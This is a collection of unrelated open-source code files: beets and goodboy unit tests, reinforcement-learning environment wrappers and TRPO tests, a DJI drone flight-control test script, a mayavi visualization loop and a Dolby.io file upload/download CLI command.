with self.assertRaises(ui.UserError):
self.run_command(u'help', u'this.is.not.a.real.command')
def test_stats(self):
l = self.run_with_output(u'stats')
self.assertIn(u'Approximate total size:', l)
# # Need to have more realistic library setup for this to work
# l = self.run_with_output('stats', '-e')
# self.assertIn('Total size:', l)
def test_version(self):
l = self.run_with_output(u'version')
self.assertIn(u'Python version', l)
self.assertIn(u'no plugins loaded', l)
# # Need to have plugin loaded
# l = self.run_with_output('version')
# self.assertIn('plugins: ', l)
class CommonOptionsParserTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
def tearDown(self):
self.teardown_beets()
def test_album_option(self):
parser = ui.CommonOptionsParser()
self.assertFalse(parser._album_flags)
parser.add_album_option()
self.assertTrue(bool(parser._album_flags))
self.assertEqual(parser.parse_args([]), ({'album': None}, []))
self.assertEqual(parser.parse_args([u'-a']), ({'album': True}, []))
self.assertEqual(parser.parse_args([u'--album']),
({'album': True}, []))
def test_path_option(self):
parser = ui.CommonOptionsParser()
parser.add_path_option()
self.assertFalse(parser._album_flags)
config['format_item'].set('$foo')
self.assertEqual(parser.parse_args([]), ({'path': None}, []))
self.assertEqual(config['format_item'].as_str(), u'$foo')
self.assertEqual(parser.parse_args([u'-p']),
({'path': True, 'format': u'$path'}, []))
self.assertEqual(parser.parse_args(['--path']),
({'path': True, 'format': u'$path'}, []))
self.assertEqual(config['format_item'].as_str(), u'$path')
self.assertEqual(config['format_album'].as_str(), u'$path')
def test_format_option(self):
parser = ui.CommonOptionsParser()
parser.add_format_option()
self.assertFalse(parser._album_flags)
config['format_item'].set('$foo')
self.assertEqual(parser.parse_args([]), ({'format': None}, []))
self.assertEqual(config['format_item'].as_str(), u'$foo')
self.assertEqual(parser.parse_args([u'-f', u'$bar']),
({'format': u'$bar'}, []))
self.assertEqual(parser.parse_args([u'--format', u'$baz']),
({'format': u'$baz'}, []))
self.assertEqual(config['format_item'].as_str(), u'$baz')
self.assertEqual(config['format_album'].as_str(), u'$baz')
def test_format_option_with_target(self):
with self.assertRaises(KeyError):
ui.CommonOptionsParser().add_format_option(target='thingy')
parser = ui.CommonOptionsParser()
parser.add_format_option(target='item')
config['format_item'].set('$item')
config['format_album'].set('$album')
self.assertEqual(parser.parse_args([u'-f', u'$bar']),
({'format': u'$bar'}, []))
self.assertEqual(config['format_item'].as_str(), u'$bar')
self.assertEqual(config['format_album'].as_str(), u'$album')
def test_format_option_with_album(self):
parser = ui.CommonOptionsParser()
parser.add_album_option()
parser.add_format_option()
config['format_item'].set('$item')
config['format_album'].set('$album')
parser.parse_args([u'-f', u'$bar'])
self.assertEqual(config['format_item'].as_str(), u'$bar')
self.assertEqual(config['format_album'].as_str(), u'$album')
parser.parse_args([u'-a', u'-f', u'$foo'])
self.assertEqual(config['format_item'].as_str(), u'$bar')
self.assertEqual(config['format_album'].as_str(), u'$foo')
parser.parse_args([u'-f', u'$foo2', u'-a'])
self.assertEqual(config['format_album'].as_str(), u'$foo2')
def test_add_all_common_options(self):
parser = ui.CommonOptionsParser()
parser.add_all_common_options()
self.assertEqual(parser.parse_args([]),
({'album': None, 'path': None, 'format': None}, []))
class EncodingTest(_common.TestCase):
"""Tests for the `terminal_encoding` config option and our
`_in_encoding` and `_out_encoding` utility functions.
"""
def out_encoding_overridden(self):
config['terminal_encoding'] = 'fake_encoding'
self.assertEqual(ui._out_encoding(), 'fake_encoding')
def in_encoding_overridden(self):
config['terminal_encoding'] = 'fake_encoding'
self.assertEqual(ui._in_encoding(), 'fake_encoding')
def out_encoding_default_utf8(self):
with patch('sys.stdout') as stdout:
stdout.encoding = None
self.assertEqual(ui._out_encoding(), 'utf-8')
def in_encoding_default_utf8(self):
with patch('sys.stdin') as stdin:
stdin.encoding = None
self.assertEqual(ui._in_encoding(), 'utf-8')
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
the-stack_106_14774
|
"""Env wrappers
Most common wrappers can be checked from following links for usage:
`https://pypi.org/project/gym-vec-env`
`https://github.com/openai/baselines/blob/master/baselines/common/wrappers.py`
"""
from collections import deque
from functools import partial
from multiprocessing import Pipe, Process, cpu_count
from sys import platform
import cv2
import gym
import numpy as np
from gym import spaces
from gym.wrappers import FlattenDictWrapper
from rlzoo.common.env_list import get_envlist
__all__ = (
'build_env', # build env
'TimeLimit', # Time limit wrapper
'NoopResetEnv', # Run random number of no-ops on reset
'FireResetEnv', # Reset wrapper for envs with fire action
'EpisodicLifeEnv', # end-of-life == end-of-episode wrapper
'MaxAndSkipEnv', # skip frame wrapper
'ClipRewardEnv', # clip reward wrapper
'WarpFrame', # warp observation wrapper
'FrameStack', # stack frame wrapper
'LazyFrames', # lazy store wrapper
'RewardShaping', # reward shaping
'SubprocVecEnv', # vectorized env wrapper
'VecFrameStack', # stack frames in vectorized env
'Monitor', # Episode reward and length monitor
'NormalizedActions', # normalized action to actual space
'DmObsTrans', # translate observations in dm_control environments
)
cv2.ocl.setUseOpenCL(False)
def build_env(env_id, env_type, vectorized=False,
seed=0, reward_shaping=None, nenv=1, **kwargs):
"""
Build env based on options
:param env_id: (str) environment id
:param env_type: (str) atari, classic_control, box2d
:param vectorized: (bool) whether sampling parrallel
:param seed: (int) random seed for env
:param reward_shaping: (callable) callable function for reward shaping
:param nenv: (int) how many processes will be used in sampling
:param kwargs: (dict)
:param max_episode_steps: (int) the maximum episode steps
"""
nenv = nenv or cpu_count() // (1 + (platform == 'darwin'))
stack = env_type == 'atari'
if nenv > 1:
if vectorized:
env = _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, stack, **kwargs)
else:
env = []
for _ in range(nenv):
single_env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
env.append(single_env) # get env as a list of same single env
else:
env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
return env
def check_name_in_list(env_id, env_type):
""" Check if env_id exists in the env_type list """
env_list = get_envlist(env_type)
if env_id not in env_list:
print('Env ID {:s} Not Found In {:s}!'.format(env_id, env_type))
else:
print('Env ID {:s} Exists!'.format(env_id))
def _make_env(env_id, env_type, seed, reward_shaping, frame_stack, **kwargs):
"""Make single env"""
check_name_in_list(env_id, env_type) # check existence of env_id in env_type
if env_type == 'atari':
env = gym.make(env_id)
env = NoopResetEnv(env, noop_max=30)
if 'NoFrameskip' in env.spec.id:
env = MaxAndSkipEnv(env, skip=4)
env = Monitor(env)
# deepmind wrap
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
elif env_type in ['classic_control', 'box2d', 'mujoco']:
env = gym.make(env_id).unwrapped
max_episode_steps = kwargs.get('max_episode_steps')
if max_episode_steps is not None:
env = TimeLimit(env.unwrapped, max_episode_steps)
env = Monitor(env)
elif env_type == 'robotics':
env = gym.make(env_id)
env = FlattenDictWrapper(env, ['observation', 'desired_goal'])
env = Monitor(env, info_keywords=('is_success',))
elif env_type == 'dm_control':
env = gym.make('dm2gym:' + env_id, environment_kwargs={'flat_observation': True})
env = DmObsTrans(env)
elif env_type == 'rlbench':
from rlzoo.common.build_rlbench_env import RLBenchEnv
state_type = kwargs.get('state_type')
env = RLBenchEnv(env_id) if state_type is None else RLBenchEnv(env_id, state_type)
else:
raise NotImplementedError
if reward_shaping is not None:
if callable(reward_shaping):
env = RewardShaping(env, reward_shaping)
else:
raise ValueError('reward_shaping parameter must be callable')
env.seed(seed)
return env
def _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, frame_stack, **kwargs):
"""Make vectorized env"""
env = SubprocVecEnv([partial(
_make_env, env_id, env_type, seed + i, reward_shaping, False, **kwargs
) for i in range(nenv)])
if frame_stack:
env = VecFrameStack(env, 4)
return env
class DmObsTrans(gym.Wrapper):
""" Observation process for DeepMind Control Suite environments """
def __init__(self, env):
self.env = env
super(DmObsTrans, self).__init__(env)
self.__need_trans = False
if isinstance(self.observation_space, gym.spaces.dict.Dict):
self.observation_space = self.observation_space['observations']
self.__need_trans = True
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
if self.__need_trans:
observation = observation['observations']
return observation, reward, done, info
def reset(self, **kwargs):
observation = self.env.reset(**kwargs)
if self.__need_trans:
observation = observation['observations']
return observation
class TimeLimit(gym.Wrapper):
def __init__(self, env, max_episode_steps=None):
self.env = env
super(TimeLimit, self).__init__(env)
self._max_episode_steps = max_episode_steps
self._elapsed_steps = 0
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
self._elapsed_steps += 1
if self._elapsed_steps >= self._max_episode_steps:
done = True
info['TimeLimit.truncated'] = True
return observation, reward, done, info
def reset(self, **kwargs):
self._elapsed_steps = 0
return self.env.reset(**kwargs)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
super(NoopResetEnv, self).__init__(env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
super(FireResetEnv, self).__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
super(EpisodicLifeEnv, self).__init__(env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if 0 < lives < self.lives:
# for Qbert sometimes we stay in lives == 0 condition for a few
# frames so it's important to keep lives > 0, so that we only reset
# once the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
super(MaxAndSkipEnv, self).__init__(env)
# most recent raw observations (for max pooling across time steps)
shape = (2,) + env.observation_space.shape
self._obs_buffer = np.zeros(shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = info = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2:
self._obs_buffer[0] = obs
if i == self._skip - 1:
self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
super(ClipRewardEnv, self).__init__(env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
super(WarpFrame, self).__init__(env)
self.width = width
self.height = height
self.grayscale = grayscale
shape = (self.height, self.width, 1 if self.grayscale else 3)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
def observation(self, frame):
if self.grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
size = (self.width, self.height)
frame = cv2.resize(frame, size, interpolation=cv2.INTER_AREA)
if self.grayscale:
frame = np.expand_dims(frame, -1)
return frame
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also `LazyFrames`
"""
super(FrameStack, self).__init__(env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are
only stored once. It exists purely to optimize memory usage which can be
huge for DQN's 1M frames replay buffers.
This object should only be converted to numpy array before being passed
to the model. You'd not believe how complex the previous solution was.
"""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
class RewardShaping(gym.RewardWrapper):
"""Shaping the reward
For reward scale, func can be `lambda r: r * scale`
"""
def __init__(self, env, func):
super(RewardShaping, self).__init__(env)
self.func = func
def reward(self, reward):
return self.func(reward)
class VecFrameStack(object):
def __init__(self, env, k):
self.env = env
self.k = k
self.action_space = env.action_space
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env._reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(object):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
self.num_envs = len(env_fns)
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
zipped_args = zip(self.work_remotes, self.remotes, env_fns)
self.ps = [
Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zipped_args
]
for p in self.ps:
# if the main process crashes, we should not cause things to hang
p.daemon = True
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.observation_space = observation_space
self.action_space = action_space
def _step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def _step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def _reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
def step(self, actions):
self._step_async(actions)
return self._step_wait()
class Monitor(gym.Wrapper):
def __init__(self, env, info_keywords=None):
super(Monitor, self).__init__(env)
self._monitor_rewards = None
self._info_keywords = info_keywords or []
def reset(self, **kwargs):
self._monitor_rewards = []
return self.env.reset(**kwargs)
def step(self, action):
o_, r, done, info = self.env.step(action)
self._monitor_rewards.append(r)
if done:
info['episode'] = {
'r': sum(self._monitor_rewards),
'l': len(self._monitor_rewards)
}
for keyword in self._info_keywords:
info['episode'][keyword] = info[keyword]
return o_, r, done, info
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
def close_env(env):
"""
close environment or environment list
"""
try:
env.close()
except:
pass
try:
for e in env:
e.close()
except:
pass
|
the-stack_106_14775
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
import nnabla as nn
import nnabla_rl.algorithms as A
import nnabla_rl.environments as E
class TestICML2015TRPO(object):
def setup_method(self, method):
nn.clear_parameters()
def test_algorithm_name(self):
dummy_env = E.DummyDiscreteImg()
trpo = A.ICML2015TRPO(dummy_env)
assert trpo.__name__ == 'ICML2015TRPO'
def test_run_online_training(self):
'''
Check that no error occurs when calling online training
'''
dummy_env = E.DummyDiscreteImg()
dummy_env = EpisodicEnv(dummy_env, min_episode_length=3)
config = A.ICML2015TRPOConfig(batch_size=5,
gpu_batch_size=2,
num_steps_per_iteration=5,
sigma_kl_divergence_constraint=10.0,
maximum_backtrack_numbers=2)
trpo = A.ICML2015TRPO(dummy_env, config=config)
trpo.train_online(dummy_env, total_iterations=1)
def test_run_offline_training(self):
'''
Check that no error occurs when calling offline training
'''
dummy_env = E.DummyDiscreteImg()
trpo = A.ICML2015TRPO(dummy_env)
with pytest.raises(NotImplementedError):
trpo.train_offline([], total_iterations=10)
def test_compute_eval_action(self):
dummy_env = E.DummyDiscreteImg()
trpo = A.ICML2015TRPO(dummy_env)
state = dummy_env.reset()
state = np.empty(dummy_env.observation_space.shape)
state = np.float32(state)
action = trpo.compute_eval_action(state)
assert action.shape == (1,)
def test_parameter_range(self):
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(gamma=-0.1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(num_steps_per_iteration=-1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(sigma_kl_divergence_constraint=-0.1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(maximum_backtrack_numbers=-0.1)
with pytest.raises(ValueError):
A.ICML2015TRPOConfig(conjugate_gradient_damping=-0.1)
def test_compute_accumulated_reward(self):
gamma = 0.99
episode_length = 3
reward_sequence = np.arange(episode_length)
gamma_seq = np.array(
[gamma**i for i in range(episode_length)])
gamma_seqs = np.zeros((episode_length, episode_length))
gamma_seqs[0] = gamma_seq
for i in range(1, episode_length):
gamma_seqs[i, i:] = gamma_seq[:-i]
expect = np.sum(reward_sequence*gamma_seqs, axis=1)
dummy_envinfo = E.DummyContinuous()
icml2015_trpo = A.ICML2015TRPO(dummy_envinfo)
accumulated_reward = icml2015_trpo._compute_accumulated_reward(
reward_sequence, gamma)
assert expect == pytest.approx(accumulated_reward.flatten())
def test_compute_accumulated_reward_raise_value_error(self):
gamma = 0.99
episode_length = 3
reward_sequence = np.arange(episode_length).reshape((1, -1))
dummy_envinfo = E.DummyContinuous()
icml2015_trpo = A.ICML2015TRPO(dummy_envinfo)
with pytest.raises(ValueError):
icml2015_trpo._compute_accumulated_reward(reward_sequence, gamma)
if __name__ == "__main__":
from testing_utils import EpisodicEnv
pytest.main()
else:
from ..testing_utils import EpisodicEnv
|
the-stack_106_14777
|
import time
from dji_asdk_to_python.products.aircraft import Aircraft
from dji_asdk_to_python.flight_controller.virtual_stick.flight_control_data import FlightControlData
from dji_asdk_to_python.flight_controller.virtual_stick.control_mode import VerticalControlMode
APP_IP = "192.168.100.210"
drone = Aircraft(APP_IP)
fc = drone.getFlightController()
res = fc.setVirtualStickModeEnabled(True)
print("res", res)
vsm = fc.getVirtualStickModeEnabled()
print("VirtualStickModeEnabled is %s" % vsm)
fcd = FlightControlData(pitch=0, roll=0, yaw=0, vertical_throttle=1)
fc.startTakeoff()
time.sleep(7) # waits until takeoff completes
# Throttle test
""" for i in range(2):
fcd.setVerticalThrottle(fcd.getVerticalThrottle() * -1)
print(fcd)
time.sleep(1)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setVerticalThrottle(fcd.getVerticalThrottle() * -1)
print(fcd)
time.sleep(1)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2) """
# Yaw test
fcd.setVerticalThrottle(0)
fcd.setYaw(20)
for i in range(2):
fcd.setYaw(fcd.getYaw() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setYaw(fcd.getYaw() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
# Pitch test
fcd.setYaw(0)
fcd.setPitch(1)
for i in range(2):
fcd.setPitch(fcd.getPitch() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setPitch(fcd.getPitch() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
# Roll test
fcd.setPitch(0)
fcd.setRoll(1)
for i in range(2):
fcd.setRoll(fcd.getRoll() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fcd.setRoll(fcd.getRoll() * -1)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(2)
fc.setVerticalControlMode(VerticalControlMode.VELOCITY)
# Using callback does not block execution
def printVerticalMode(vertical_mode):
print("aircraft vertical mode is %s" % vertical_mode)
fc.getVerticalControlMode(callback=printVerticalMode)
fc.setVerticalControlMode(VerticalControlMode.POSITION)
fc.getVerticalControlMode(callback=printVerticalMode)
fcd.setYaw(0)
fcd.setRoll(0)
fcd.setPitch(0)
for i in range(3):
fcd.setVerticalThrottle(3)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(3)
fcd.setVerticalThrottle(6)
print(fcd)
for i in range(10):
fc.sendVirtualStickFlightControlData(fcd)
time.sleep(0.1)
time.sleep(3)
print(fc.getVerticalControlMode(callback=printVerticalMode))
fc.setVirtualStickModeEnabled(False)
fc.startLanding()
|
the-stack_106_14778
|
from mayavi import mlab
from mayavi.mlab import *
from mayavi.mlab import savefig
import pylab
import tables
def getMesh(grid):
xlo, ylo, zlo = grid._v_attrs.vsLowerBounds
xup, yup, zup = grid._v_attrs.vsUpperBounds
nx, ny, nz = grid._v_attrs.vsNumCells
x, y, z = pylab.mgrid[xlo:xup:nx*1j, ylo:yup:ny*1j, zlo:zup:nz*1j]
return x, y, z
for i in range(0,22):
print ("Working on frame %d ... " % i)
fh = tables.openFile("s445-euler-rt-3d_q_%d.h5" % i)
grid = fh.root.StructGrid
nx, ny, nz = grid._v_attrs.vsNumCells
x, y, z = getMesh(grid)
rho = fh.root.StructGridField[:,:,:,0]
rhoSd = pipeline.scalar_field(x,y,z,rho)
# add various figures
pipeline.image_plane_widget(rhoSd,
plane_orientation='x_axes',
slice_index=nx/2)
pipeline.image_plane_widget(rhoSd,
plane_orientation='z_axes',
slice_index=nz/2)
outline()
pipeline.iso_surface(rhoSd, contours=[1.5], opacity=0.75)
roll(0.0)
savefig('s445-euler-rt_rho_%05d.png' % i, magnification=2.0)
close()
fh.close()
|
the-stack_106_14780
|
"""
Command: Input / Output
"""
from argparse import _SubParsersAction, Namespace
from dolbyio_rest_apis.media import io
def command_name() -> str:
return 'io'
def add_arguments(sub_parsers: _SubParsersAction) -> None:
parser = sub_parsers.add_parser(command_name(), help='Input / Output')
parser.add_argument(
'--api_key',
help='Your API Key.',
required=True,
type=str
)
parser.add_argument(
'--dlb_url',
help='''
The `url` should be in the form `dlb://object-key` where the object-key can be any alpha-numeric string.
The object-key is unique to your account API Key so there is no risk of collision with other users.
''',
required=True,
type=str
)
parser.add_argument(
'--file',
help='File to upload.',
required=True,
type=str
)
sub_parsers_io = parser.add_subparsers(dest='sub_command')
sub_parsers_io.add_parser('upload', help='Upload a file')
sub_parsers_io.add_parser('download', help='Download a file')
async def execute_command(args: Namespace) -> None:
api_key = args.api_key
dlb_url = args.dlb_url
file = args.file
if args.sub_command == 'upload':
upload_url = await io.get_upload_url(
api_key=api_key,
dlb_url=dlb_url
)
print(f'Upload URL: {upload_url}')
await io.upload_file(
upload_url=upload_url,
file_path=file
)
print(f'File uploaded to {dlb_url}')
elif args.sub_command == 'download':
await io.download_file(
api_key=api_key,
dlb_url=dlb_url,
file_path=file
)
print(f'File saved at {file}')
|
the-stack_106_14781
|
from datetime import datetime
from goodboy.errors import Error
from goodboy.messages import type_name
from goodboy.types.dates import DateTime
from tests.conftest import assert_errors, validate_value_has_odd_year
def test_accepts_datetime_type():
schema = DateTime()
good_value = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_value) == good_value
def test_rejects_non_datetime_type():
schema = DateTime()
bad_value = "1985-10-26T09:00:00"
with assert_errors(
[Error("unexpected_type", {"expected_type": type_name("datetime")})]
):
schema(bad_value)
def test_type_casting_accepts_good_input_with_default_format():
schema = DateTime()
good_input = "1985-10-26T09:00:00"
value = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_input, typecast=True) == value
def test_type_casting_rejects_bad_input_with_default_format():
schema = DateTime()
bad_input = "1985/10/26 09:00:00"
with assert_errors([Error("invalid_datetime_format")]):
schema(bad_input, typecast=True)
def test_type_casting_accepts_good_input_with_custom_format():
schema = DateTime(format="%Y/%m/%d %H:%M:%S")
good_input = "1985/10/26 09:00:00"
value = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_input, typecast=True) == value
def test_type_casting_rejects_bad_input_with_custom_format():
schema = DateTime(format="%Y/%m/%d %H:%M:%S")
bad_input = "1985-10-26T09:00:00"
with assert_errors([Error("invalid_datetime_format")]):
schema(bad_input, typecast=True)
def test_type_casting_accepts_good_input_with_custom_format_from_context():
schema = DateTime(format="should_not_be_used")
good_input = "1985/10/26 09:00:00"
value = datetime(1985, 10, 26, 9, 0, 0)
context = {"date_format": "%Y/%m/%d %H:%M:%S"}
assert schema(good_input, typecast=True, context=context) == value
def test_type_casting_rejects_bad_input_with_custom_format_from_context():
schema = DateTime(format="should_not_be_used")
bad_input = "1985-10-26T09:00:00"
context = {"date_format": "%Y/%m/%d %H:%M:%S"}
with assert_errors([Error("invalid_datetime_format")]):
schema(bad_input, typecast=True, context=context)
def test_type_casting_accepts_date_values():
schema = DateTime()
good_input = datetime(1985, 10, 26, 9, 0, 0)
assert schema(good_input, typecast=True) == good_input
def test_type_casting_rejects_non_string_values():
schema = DateTime()
bad_input = 42
with assert_errors(
[Error("unexpected_type", {"expected_type": type_name("datetime")})]
):
schema(bad_input, typecast=True)
def test_accepts_allowed_value():
schema = DateTime(
allowed=[datetime(1985, 10, 26, 9, 0, 0), datetime(2015, 10, 21, 7, 28, 0)]
)
assert schema(datetime(1985, 10, 26, 9, 0, 0)) == datetime(1985, 10, 26, 9, 0, 0)
assert schema(datetime(2015, 10, 21, 7, 28, 0)) == datetime(2015, 10, 21, 7, 28, 0)
def test_none_check_precedes_allowed():
schema = DateTime(
allowed=[datetime(1985, 10, 26, 9, 0, 0), datetime(2015, 10, 21, 7, 28, 0)],
allow_none=True,
)
assert schema(None) is None
def test_rejects_not_allowed_value():
allowed = [datetime(1985, 10, 26, 9, 0, 0), datetime(2015, 10, 21, 7, 28, 0)]
